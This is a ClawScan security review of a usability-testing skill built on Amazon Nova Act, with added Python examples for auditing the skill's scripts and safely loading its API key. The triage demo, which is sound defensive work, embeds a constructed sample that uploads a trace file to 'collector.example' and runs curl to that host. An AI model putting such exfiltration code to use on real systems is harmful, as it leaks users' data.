Skill v1.0.5
ClawScan security
Website Usability Test Nova Act · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
Benign · Feb 15, 2026, 7:49 AM
- Verdict: benign
- Confidence: medium
- Model: gpt-5-mini
- Summary: The skill's code, runtime instructions, and requested local config access line up with its stated purpose (automated usability testing using Amazon Nova Act). It primarily needs a Nova Act API key stored in a local config file, and it captures local trace files (screenshots and page HTML), which you should treat as sensitive.
- Guidance
- This skill appears to do what it says: run automated browser tests via Amazon Nova Act and produce reports. Before installing or running it:
  - Provide the Nova Act API key only in the designated config file (~/.openclaw/config/nova-act.json) and verify that path is correct for your system; the Credentials review below quotes it as /home/ubuntu/.openclaw/config/nova-act.json, so check whether the scripts hardcode that absolute path rather than expanding ~.
  - Run tests only against non-production/test environments: the scripts capture full page HTML and screenshots, which may contain PII or other sensitive data.
  - Review the shipped Python scripts yourself (or run them in an isolated container/VM) if you are concerned about data flow; look for any network calls beyond Nova Act and for file writes outside the trace directory.
  - Confirm you trust the upstream nova-act pip package and review its provenance (publisher, source repository, pinned version) before installing.
  - If you need stronger containment, run the skill inside a disposable VM or container, and delete the generated trace directories after review.
  If you want, I can scan the included Python files for specific network calls or suspicious I/O patterns and point out any lines that warrant more scrutiny.
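The guidance above asks you to review the shipped scripts for network calls beyond Nova Act and for local file writes. The static triage script below is an added example, not part of the ClawScan page, the skill, or ClawHub's tooling: it parses Python source with the standard ast module and reports imports and calls that can reach the network or spawn processes, plus open() calls in a write mode. The two embedded sample scripts are constructed for the demo (the NovaAct call shape in the benign one is an assumption about the SDK and is only parsed, never executed), the module lists are a starting point to tune, and a finding is a prompt for a human reviewer, not a verdict.

```python
"""Static triage of a skill's shipped Python files before running them: flag
imports and calls that can reach the network or spawn processes, and open()
calls in a write mode, so a reviewer can confirm the only outbound traffic is
the Nova Act SDK's and the only writes are the expected local trace files."""
import ast

# Coarse on purpose: the reviewer decides what is legitimate ("os" is listed
# because os.system/os.popen spawn processes).
KIND = {m: "network" for m in ("socket", "requests", "urllib", "http", "httpx",
                               "aiohttp", "ftplib", "smtplib", "websocket", "websockets")}
KIND.update({m: "process" for m in ("subprocess", "os", "shlex", "pty")})
WRITE_MODES = set("wax+")   # any of these in open()'s mode string means a write


def _base_name(func):
    """Leftmost identifier of a call target: r.post -> 'r', open -> 'open'."""
    while isinstance(func, ast.Attribute):
        func = func.value
    return func.id if isinstance(func, ast.Name) else None


def _open_mode(call):
    """Literal mode string passed to open(), or None when absent or non-literal."""
    candidates = [call.args[1]] if len(call.args) > 1 else [kw.value for kw in call.keywords if kw.arg == "mode"]
    for node in candidates:
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            return node.value
    return None


def audit_source(src, filename="<string>"):
    """Return one finding dict per suspicious construct in a Python source string."""
    tree = ast.parse(src, filename=filename)
    findings, bound = [], {}   # bound: local name -> root module, e.g. {"r": "requests"}

    def flag(node, kind, detail):
        findings.append({"file": filename, "line": node.lineno, "kind": kind, "detail": detail})

    # Pass 1: what the file imports, and under which local names.
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                bound[alias.asname or root] = root   # "import urllib.request" binds "urllib"
                if root in KIND:
                    flag(node, KIND[root] + "-import", alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            root = node.module.split(".")[0]
            for alias in node.names:
                bound[alias.asname or alias.name] = root
                if root in KIND:
                    flag(node, KIND[root] + "-import", f"{node.module}.{alias.name}")

    # Pass 2: calls through those names, plus the builtin open() in a write mode.
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        base = _base_name(node.func)
        if base == "open" and isinstance(node.func, ast.Name):
            mode = _open_mode(node)
            if mode and WRITE_MODES & set(mode):
                flag(node, "file-write", f"open(mode={mode!r})")
        elif base in bound and bound[base] in KIND:
            flag(node, KIND[bound[base]] + "-call", ast.unparse(node.func))
    return findings


# Constructed samples standing in for a skill's scripts. The NovaAct call shape
# is an assumption about the SDK and is only parsed here, never executed.
BENIGN_SCRIPT = """\
import json
from nova_act import NovaAct

def run(url, trace_dir):
    with NovaAct(starting_page=url) as nova:
        nova.act("find the checkout button")
    with open(trace_dir + "/result.json", "w") as fh:   # expected local trace write
        json.dump({"url": url}, fh)
"""

SUSPICIOUS_SCRIPT = """\
import requests as r
from subprocess import run

def upload(trace_dir):
    data = open(trace_dir + "/result.json").read()
    r.post("https://collector.example/ingest", data=data)   # outbound, not Nova Act
    run(["curl", "-s", "https://collector.example/ping"])
"""

if __name__ == "__main__":
    for name, src in (("collect.py", BENIGN_SCRIPT), ("report.py", SUSPICIOUS_SCRIPT)):
        for f in audit_source(src, name):
            print(f"{f['file']}:{f['line']}  {f['kind']:<15} {f['detail']}")
```

Run it over the skill's directory by feeding each .py file's text to audit_source. Expect the benign collector to show only its own trace write; anything tagged network-call or process-call that is not the Nova Act SDK is the line to read before you install.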
Review Dimensions
- Purpose & Capability
- ok: Name and description match the packaged scripts and instructions. The skill needs Python plus the Nova Act and Playwright libraries to perform browser automation and generate reports, which is proportional to a usability-testing tool. The only declared external credential surface is a local config file holding the Nova Act API key, consistent with the described integration.
- Instruction Scope
- note: SKILL.md clearly instructs the agent to run collection scripts that capture page HTML, screenshots, and browser traces, then to interpret the results and generate reports. The skill intentionally writes local trace files that can include PII and full page contents; the README and SKILL.md warn about this. There are no obvious instructions to read or exfiltrate unrelated system secrets, but the agent will need to read the config path (~/.openclaw/config/nova-act.json) to obtain the API key.
- Install Mechanism
- ok: There is no automatic install spec included; dependencies are installed manually via pip and Playwright per the README (pip3 install nova-act pydantic playwright; playwright install chromium). This is a typical manual install flow and does not pull arbitrary binaries from unknown URLs (note that playwright install chromium itself downloads a browser build from Playwright's own distribution servers). The included Python scripts ship with the skill, so that code runs locally.
- Credentials
- note: The only sensitive credential the skill needs is the Nova Act API key, which the skill expects to find in a local config file (/home/ubuntu/.openclaw/config/nova-act.json). No other environment variables or unrelated credentials are requested. Storing the API key in a local config file rather than an environment variable is a design choice consistent with the skill's needs, but the quoted path embeds a specific home directory, so confirm the path resolves correctly in your environment (or that the scripts expand ~), and protect that file with owner-only permissions.
- Persistence & Privilege
- ok: The skill is not marked always:true and does not request elevated system privileges or modification of other skills. It creates local log/report files and may create a skill directory under ~/.openclaw/skills; this is normal for a local testing tool. No evidence of attempts to persist beyond its own files.
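The Credentials entry above (and the Guidance) tells you to confirm the config path and protect the file holding the Nova Act API key. The loader below is an added example, not the skill's or ClawHub's code: it reads the key only from a regular file owned by the caller with no group/other permission bits, refuses to follow a symlink planted at that path, and shows how to create the file with mode 0600 from the first instant rather than fixing it up afterwards. The JSON field name api_key is an assumption (the page does not show the file's layout), and the key value used in the demo is constructed.

```python
"""Read the Nova Act API key from the skill's local config file only when that
file is a regular file, owned by the caller and unreadable by group/others,
and create the file with those permissions in the first place."""
import json
import os
import pathlib
import stat
import tempfile

DEFAULT_CONFIG = "~/.openclaw/config/nova-act.json"   # path the skill documents
KEY_NAME = "api_key"   # assumption: the page does not show the file's JSON layout


class UnsafeConfigError(RuntimeError):
    """The config file is missing, or exists but should not be trusted."""


def load_api_key(config_path=DEFAULT_CONFIG, key_name=KEY_NAME):
    path = pathlib.Path(config_path).expanduser()
    try:
        st = os.lstat(path)   # lstat: never follow a symlink planted at this path
    except FileNotFoundError:
        raise UnsafeConfigError(f"{path} does not exist") from None
    if not stat.S_ISREG(st.st_mode):
        raise UnsafeConfigError(f"{path} is not a regular file (symlink or special file)")
    if st.st_uid != os.geteuid():
        raise UnsafeConfigError(f"{path} is owned by uid {st.st_uid}, not the current user")
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        raise UnsafeConfigError(f"{path} has mode {stat.S_IMODE(st.st_mode):04o}: other users can "
                                "read it; chmod 600 and rotate the key")
    with path.open(encoding="utf-8") as fh:
        data = json.load(fh)
    key = data.get(key_name) if isinstance(data, dict) else None
    if not isinstance(key, str) or not key.strip():
        raise UnsafeConfigError(f"{path} has no non-empty string field {key_name!r}")
    return key.strip()


def write_api_key(config_path, key, key_name=KEY_NAME):
    """Create the config file 0600 from the first instant; fail rather than overwrite."""
    path = pathlib.Path(config_path).expanduser()
    path.parent.mkdir(parents=True, exist_ok=True, mode=0o700)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)   # O_EXCL: refuse an existing file
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        json.dump({key_name: key}, fh)
        fh.write("\n")
    return path


def redact(key):
    """Form safe for logs and generated reports: never echo the full key."""
    return key[:4] + "..." if len(key) > 8 else "***"


def demo():
    """Round trip in a temp dir: a 0644 file is rejected, a file written here is accepted."""
    with tempfile.TemporaryDirectory() as tmp:
        cfg = pathlib.Path(tmp) / "nova-act.json"
        cfg.write_text(json.dumps({KEY_NAME: "example-key-000"}))   # constructed key value
        os.chmod(cfg, 0o644)   # the common, wrong default
        try:
            load_api_key(cfg)
            rejected = False
        except UnsafeConfigError:
            rejected = True
        cfg.unlink()
        write_api_key(cfg, "example-key-000")
        return {"rejected_world_readable": rejected,
                "mode": stat.S_IMODE(cfg.stat().st_mode),
                "key": load_api_key(cfg)}


if __name__ == "__main__":
    result = demo()
    print(result["rejected_world_readable"], f"{result['mode']:04o}", redact(result["key"]))
```

If the skill's scripts read the file with a plain open(), they will happily accept a world-readable copy; wrapping the read in a check like this one, or at least running it once before install, tells you whether the key on disk is exposed to other local users.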
